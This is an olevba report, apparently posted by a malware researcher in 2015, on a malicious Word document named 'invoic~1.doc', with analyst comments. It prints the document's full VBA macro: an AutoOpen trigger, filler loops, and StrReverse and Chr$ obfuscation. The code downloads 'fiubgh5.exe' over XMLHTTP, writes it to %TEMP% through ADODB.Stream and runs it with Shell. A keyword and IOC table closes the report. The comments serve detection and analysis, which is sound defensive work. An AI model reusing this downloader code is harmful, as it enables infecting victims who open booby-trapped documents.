dynamoo

Malicious Word macro

Dec 15th, 2015
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OpX:MASIHB-V invoic~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: invoic~1.doc
  10. Type: OpenXML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub JSUrgGsyv()
      ' Analyst note: trampoline between the auto-run entry points (AutoOpen /
      ' Workbook_Open) and UIkcdidYs, which does the download and execution.
      ' Everything before the final call is counting loops whose counters are
      ' never read again: filler code, presumably there to pad the macro and
      ' vary its shape between samples (inferred, not shown by the dump).
  16. 'tmpo22
  17.  
  18. Dim JdgReyjd As Integer
  19.  
  20. Dim ShdwdjJds As Integer
  21. ShdwdjJds = 6
  22. Do While ShdwdjJds < 59
  23. DoEvents: ShdwdjJds = ShdwdjJds + 1
  24. Loop
  25.  
  26. JdgReyjd = 4
      ' Nested filler: the inner loop runs to completion once, then the outer
      ' loop only increments.
  27. Do While JdgReyjd < 81
  28.  
  29. Dim uYetBsjfhs As Integer
  30. uYetBsjfhs = 8
  31. Do While uYetBsjfhs < 72
  32. DoEvents: uYetBsjfhs = uYetBsjfhs + 1
  33. Loop
  34.  
  35. DoEvents: JdgReyjd = JdgReyjd + 1
  36.  
  37. Loop
  38.  
  39.  
  40. Dim PsiosJstwvd As Integer
  41. PsiosJstwvd = 2
  42. Do While PsiosJstwvd < 25
  43. DoEvents: PsiosJstwvd = PsiosJstwvd + 1
  44. Loop
  45.  
      ' The only statement with an effect: hand off to the downloader routine
      ' in module aIuhYqZk.
  46. UIkcdidYs
  47. End Sub
  48. Sub AutoOpen()
      ' Analyst note: Word auto-run entry point (olevba flags it as AutoExec in
      ' the summary table). It runs when the document is opened with macros
      ' enabled. The loops below are filler; the only meaningful statement is
      ' the call to JSUrgGsyv at the end.
  49.  
  50. Dim iUwuUWuxc As Integer
  51.  
  52. Dim pojxwSdc As Integer
  53. pojxwSdc = 4
  54. Do While pojxwSdc < 77
  55. DoEvents: pojxwSdc = pojxwSdc + 1
  56. Loop
  57.  
  58. iUwuUWuxc = 6
  59. Do While iUwuUWuxc < 29
  60.  
  61. Dim FoewfdSy As Integer
  62. FoewfdSy = 9
  63. Do While FoewfdSy < 34
  64. DoEvents: FoewfdSy = FoewfdSy + 1
  65. Loop
  66.  
  67. DoEvents: iUwuUWuxc = iUwuUWuxc + 1
  68.  
  69. Loop
  70.  
  71.  
  72. Dim AdhsajhEc As Integer
  73. AdhsajhEc = 7
  74. Do While AdhsajhEc < 89
  75. DoEvents: AdhsajhEc = AdhsajhEc + 1
  76. Loop
  77.  
      ' Start of the chain: JSUrgGsyv -> UIkcdidYs (download, save, Shell).
  78.     JSUrgGsyv
  79. End Sub
  80. Sub Workbook_Open()
      ' Analyst note: second entry point with the same shape as AutoOpen.
      ' olevba lists Workbook_Open as the Excel auto-run name; this copy sits in
      ' a Word ThisDocument module, so whether it ever fires for this sample is
      ' not shown here. It is presumably template code shared with Excel lures.
      ' Filler loops again precede the single call to JSUrgGsyv.
  81.  
  82. Dim IowxJDdsr As Integer
  83.  
  84. Dim bGdkaJjdsd As Integer
  85. bGdkaJjdsd = 4
  86. Do While bGdkaJjdsd < 71
  87. DoEvents: bGdkaJjdsd = bGdkaJjdsd + 1
  88. Loop
  89.  
  90. IowxJDdsr = 5
  91. Do While IowxJDdsr < 75
  92.  
  93. Dim wSfowpcD As Integer
  94. wSfowpcD = 7
  95. Do While wSfowpcD < 88
  96. DoEvents: wSfowpcD = wSfowpcD + 1
  97. Loop
  98.  
  99. DoEvents: IowxJDdsr = IowxJDdsr + 1
  100. Loop
  101.  
  102.  
  103. Dim iAcvpaJHdc As Integer
  104. iAcvpaJHdc = 6
  105. Do While iAcvpaJHdc < 56
  106. DoEvents: iAcvpaJHdc = iAcvpaJHdc + 1
  107. Loop
  108.  
      ' Same hand-off as AutoOpen.
  109.     JSUrgGsyv
  110. End Sub
  111.  
  112.  
  113.  
  114.  
  115.  
  116. -------------------------------------------------------------------------------
  117. VBA MACRO trekdddjvjb.bas
  118. in file: word/vbaProject.bin - OLE stream: u'VBA/trekdddjvjb'
  119. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  120. Public Function oPlKtRebGf()
       ' Analyst note: assembles the request URL that UIkcdidYs passes to
       ' XMLHTTP.Open. Only the tail is visible in code:
       ' "/x16" + "56/d" + "fiubgh5.exe" = "/x1656/dfiubgh5.exe".
       ' The leading parts come from UserForm controls TextBox4 and TextBox1 on
       ' oGdyeJdhsdd. Their values are not in this report, so the scheme and
       ' host cannot be recovered from the listing alone. Pull the control
       ' values from the form's OLE stream to complete the network IOC.
  121. hyyuejkjs = "/x16"
  122. yyeidsadf = "56/d"
  123. iuyhgdfsdf = oGdyeJdhsdd.TextBox1
       ' File name flagged as an IOC in olevba's summary table.
  124. yeuijjffsa = "fiubgh5.exe"
  125. oPlKtRebGf = oGdyeJdhsdd.TextBox4 + iuyhgdfsdf + hyyuejkjs + yyeidsadf + yeuijjffsa
  126. End Function
  127.  
  128.  
  129.  
  130. -------------------------------------------------------------------------------
  131. VBA MACRO oerdkaksnc.bas
  132. in file: word/vbaProject.bin - OLE stream: u'VBA/oerdkaksnc'
  133. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  134. Public Function nHdiPwTgFsd()
       ' Analyst note: builds the local path the downloaded body is saved to.
       ' jduyewiskd.uYtbdTsc returns "TEMP" and the Chr$() run decodes to
       ' "/shereder" (both confirmed in olevba's VBA-string rows). The result is
       ' Environ("TEMP") & "/shereder" + TextBox3. TextBox3 is a form control
       ' whose value is not in this report; it presumably supplies the file
       ' extension, so confirm it from the form stream. Host-side IOC: a file
       ' named shereder* created in the user's TEMP directory.
  135.  
  136. nHdiPwTgFsd = Environ(jduyewiskd.uYtbdTsc) & Chr$(47) & Chr$(115) & Chr$(104) & Chr$(101) & Chr$(114) & Chr$(101) & Chr$(100) & Chr$(101) & Chr$(114) + oGdyeJdhsdd.TextBox3
  137.  
  138. End Function
  139.  
  140.  
  141.  
  142.  
  143.  
  144.  
  145.  
  146.  
  147.  
  148.  
  149.  
  150.  
  151.  
  152.  
  153.  
  154.  
  155.  
  156.  
  157.  
  158.  
  159.  
  160. -------------------------------------------------------------------------------
  161. VBA MACRO jduyewiskd.bas
  162. in file: word/vbaProject.bin - OLE stream: u'VBA/jduyewiskd'
  163. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  164. Public Function uYtbdTsc()
       ' Analyst note: returns "TEMP" (reversed literal), used as the Environ()
       ' variable name in oerdkaksnc.nHdiPwTgFsd.
  165.  uYtbdTsc = StrReverse("PMET")
  166. End Function
  167. Public Function IdjcTrsj()
       ' Analyst note: returns "Microsoft.XMLHTTP" (reversed literal), the ProgID
       ' passed to CreateObject in UIkcdidYs. Reversing keeps the ProgID out of
       ' plain-string scans of the macro source.
  168. IdjcTrsj = StrReverse("PTTHLMX.tfosorciM")
  169. End Function
  170. Public Function ThWockSv()
       ' Analyst note: returns "ADODB.Stream" (reversed literal), the ProgID
       ' passed to CreateObject in uwopdhftes to write the response to disk.
  171. ThWockSv = StrReverse("maertS.BDODA")
  172. End Function
  173.  
  174.  
  175.  
  176.  
  177.  
  178.  
  179.  
  180.  
  181.  
  182.  
  183.  
  184.  
  185.  
  186.  
  187.  
  188.  
  189.  
  190.  
  191.  
  192.  
  193.  
  194. -------------------------------------------------------------------------------
  195. VBA MACRO aIuhYqZk.bas
  196. in file: word/vbaProject.bin - OLE stream: u'VBA/aIuhYqZk'
  197. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  198. Sub UIkcdidYs()
       ' Analyst note: core downloader routine. Its steps, in order:
       '   1. create a Microsoft.XMLHTTP object,
       '   2. send a synchronous HTTP request to the URL from
       '      trekdddjvjb.oPlKtRebGf,
       '   3. pass the response object to uwopdhftes, which writes the body to
       '      disk,
       '   4. call Shell on a value read from the UserForm.
       ' The Integer counting loops between steps are filler with no effect on
       ' the outcome.
       ' Detection pointers: an Office process making an outbound HTTP request
       ' for a .exe, writing a file under %TEMP%, then spawning a child process.
  199.  
       ' jduyewiskd.IdjcTrsj returns "Microsoft.XMLHTTP".
  200. Set dsfgty = CreateObject(jduyewiskd.IdjcTrsj)
  201.  
  202. Dim uehdbcxsd As Integer
  203. uehdbcxsd = 7
  204. Do While uehdbcxsd < 66
  205. DoEvents: uehdbcxsd = uehdbcxsd + 1
  206. Loop
  207.  
       ' StrReverse("TSOP") = "POST". The third argument False makes the call
       ' synchronous, so send blocks until the response has arrived.
  208. dsfgty.Open StrReverse("TSOP"), trekdddjvjb.oPlKtRebGf, False
  209.  
  210. Dim kiwqazbcf As Integer
  211. kiwqazbcf = 5
  212. Do While kiwqazbcf < 78
  213. DoEvents: kiwqazbcf = kiwqazbcf + 1
  214. Loop
  215.  
       ' The request is sent with no body.
  216. dsfgty.send
  217.  
  218. Dim ieywhdcba As Integer
  219. ieywhdcba = 9
  220. Do While ieywhdcba < 38
  221. DoEvents: ieywhdcba = ieywhdcba + 1
  222. Loop
  223.  
       ' Hands the completed request object to the file-writing helper.
  224. uwopdhftes dsfgty
  225.  
  226. Dim tRekfhgwv As Integer
  227. tRekfhgwv = 9
  228. Do While tRekfhgwv < 82
  229. DoEvents: tRekfhgwv = tRekfhgwv + 1
  230. Loop
  231.  
       ' Runs the command string held by form member bhjsdfvcjdds. That value is
       ' not in this report. NOTE(review): presumably the path just written
       ' under %TEMP%; confirm against the form stream.
  232. Shell oGdyeJdhsdd.bhjsdfvcjdds
  233. End Sub
  234.  
  235. Function uwopdhftes(ByVal jfytwjhdb)
       ' Analyst note: writes the HTTP response body to disk through
       ' ADODB.Stream. jfytwjhdb is the XMLHTTP object passed in by UIkcdidYs.
       ' The numeric arguments are written as arithmetic (2 - 1, 3 - 1) so the
       ' usual constants do not appear literally. The Integer counting loops
       ' between steps are filler.
  236.  
       ' jduyewiskd.ThWockSv returns "ADODB.Stream".
  237.     Set xxxcvcxvb = CreateObject(jduyewiskd.ThWockSv)
  238.  
  239. Dim OpHfreohd As Integer
  240. OpHfreohd = 4
  241. Do While OpHfreohd < 54
  242. DoEvents: OpHfreohd = OpHfreohd + 1
  243. Loop
  244.  
  245.     xxxcvcxvb.Open
  246.  
  247. Dim IuwSjskwq As Integer
  248. IuwSjskwq = 4
  249. Do While IuwSjskwq < 67
  250. DoEvents: IuwSjskwq = IuwSjskwq + 1
  251. Loop
  252.  
       ' 2 - 1 = 1 = adTypeBinary: the stream holds raw bytes, not text.
  253.     xxxcvcxvb.Type = 2 - 1
  254.  
  255. Dim jHewysLd As Integer
  256. jHewysLd = 7
  257. Do While jHewysLd < 84
  258. DoEvents: jHewysLd = jHewysLd + 1
  259. Loop
  260.  
       ' Copies the downloaded bytes into the stream unmodified. No decoding or
       ' decryption step is visible in this listing.
  261.     xxxcvcxvb.Write jfytwjhdb.responseBody
  262.  
  263. Dim oYeBsdhd As Integer
  264. oYeBsdhd = 4
  265. Do While oYeBsdhd < 76
  266. DoEvents: oYeBsdhd = oYeBsdhd + 1
  267. Loop
  268.  
       ' Target path comes from oerdkaksnc.nHdiPwTgFsd, i.e. %TEMP%/shereder plus
       ' the TextBox3 value. 3 - 1 = 2 = adSaveCreateOverWrite, so an existing
       ' file at that path is replaced.
  269.     xxxcvcxvb.SaveToFile oerdkaksnc.nHdiPwTgFsd, 3 - 1
  270.  
  271. Dim YrtGfdvzw As Integer
  272. YrtGfdvzw = 6
  273. Do While YrtGfdvzw < 63
  274. DoEvents: YrtGfdvzw = YrtGfdvzw + 1
  275. Loop
  276.  
  277.     xxxcvcxvb.Close
  278.  
  279. End Function
  280.  
  281.  
  282.  
  283.  
  284.  
  285.  
  286.  
  287.  
  288.  
  289.  
  290.  
  291.  
  292.  
  293.  
  294.  
  295.  
  296.  
  297.  
  298.  
  299.  
  300.  
  301. -------------------------------------------------------------------------------
  302. VBA MACRO oGdyeJdhsdd.frm
  303. in file: word/vbaProject.bin - OLE stream: u'VBA/oGdyeJdhsdd'
  304. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  305. Private Sub TextBox1_Change()
       ' Analyst note: empty event handler. The UserForm carries no logic of its
       ' own in this dump. Other modules read its members (TextBox1, TextBox3,
       ' TextBox4, bhjsdfvcjdds) as string storage, and those values are not
       ' included in this report. They have to be extracted from the form's
       ' OLE stream to recover the full URL, the saved file name and the
       ' executed command.
  306.  
  307. End Sub
  308. -------------------------------------------------------------------------------
  309. VBA MACRO Class1.cls
  310. in file: word/vbaProject.bin - OLE stream: u'VBA/Class1'
  311. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  312. (empty macro)
  313. -------------------------------------------------------------------------------
  314. VBA MACRO Class2.cls
  315. in file: word/vbaProject.bin - OLE stream: u'VBA/Class2'
  316. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  317. (empty macro)
  318. -------------------------------------------------------------------------------
  319. VBA MACRO Class3.cls
  320. in file: word/vbaProject.bin - OLE stream: u'VBA/Class3'
  321. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  322. (empty macro)
  323. -------------------------------------------------------------------------------
  324. VBA MACRO Class4.cls
  325. in file: word/vbaProject.bin - OLE stream: u'VBA/Class4'
  326. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  327. (empty macro)
  328. -------------------------------------------------------------------------------
  329. VBA MACRO Class5.cls
  330. in file: word/vbaProject.bin - OLE stream: u'VBA/Class5'
  331. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  332. (empty macro)
  333. -------------------------------------------------------------------------------
  334. VBA MACRO Class6.cls
  335. in file: word/vbaProject.bin - OLE stream: u'VBA/Class6'
  336. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  337. (empty macro)
  338. -------------------------------------------------------------------------------
  339. VBA MACRO Class7.cls
  340. in file: word/vbaProject.bin - OLE stream: u'VBA/Class7'
  341. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  342. (empty macro)
  343. -------------------------------------------------------------------------------
  344. VBA MACRO Class8.cls
  345. in file: word/vbaProject.bin - OLE stream: u'VBA/Class8'
  346. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  347. (empty macro)
  348. -------------------------------------------------------------------------------
  349. VBA MACRO Class9.cls
  350. in file: word/vbaProject.bin - OLE stream: u'VBA/Class9'
  351. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  352. (empty macro)
  353. -------------------------------------------------------------------------------
  354. VBA MACRO Class10.cls
  355. in file: word/vbaProject.bin - OLE stream: u'VBA/Class10'
  356. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  357. (empty macro)
  358. +------------+----------------------+-----------------------------------------+
  359. | Type       | Keyword              | Description                             |
  360. +------------+----------------------+-----------------------------------------+
  361. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  362. | AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
  363. | Suspicious | Open                 | May open a file                         |
  364. | Suspicious | Shell                | May run an executable file or a system  |
  365. |            |                      | command                                 |
  366. | Suspicious | CreateObject         | May create an OLE object                |
  367. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  368. |            |                      | strings                                 |
  369. | Suspicious | StrReverse           | May attempt to obfuscate specific       |
  370. |            |                      | strings                                 |
  371. | Suspicious | SaveToFile           | May create a text file                  |
  372. | Suspicious | Environ              | May read system environment variables   |
  373. | Suspicious | Write                | May write to a file (if combined with   |
  374. |            |                      | Open)                                   |
  375. | Suspicious | ADODB.Stream         | May create a text file (obfuscation:    |
  376. |            |                      | VBA expression)                         |
  377. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
  378. |            |                      | (obfuscation: VBA expression)           |
  379. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  380. |            |                      | be used to obfuscate strings (option    |
  381. |            |                      | --decode to see all)                    |
  382. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  383. |            |                      | may be used to obfuscate strings        |
  384. |            |                      | (option --decode to see all)            |
  385. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  386. |            | Strings              | may be used to obfuscate strings        |
  387. |            |                      | (option --decode to see all)            |
  388. | IOC        | fiubgh5.exe          | Executable file name                    |
  389. | VBA string | /shereder            | Chr$(47) & Chr$(115) & Chr$(104) &      |
  390. |            |                      | Chr$(101) & Chr$(114) & Chr$(101) &     |
  391. |            |                      | Chr$(100) & Chr$(101) & Chr$(114)       |
  392. | VBA string | TEMP                 | StrReverse("PMET")                      |
  393. | VBA string | Microsoft.XMLHTTP    | StrReverse("PTTHLMX.tfosorciM")         |
  394. | VBA string | ADODB.Stream         | StrReverse("maertS.BDODA")              |
  395. | VBA string | POST                 | StrReverse("TSOP")                      |
  396. +------------+----------------------+-----------------------------------------+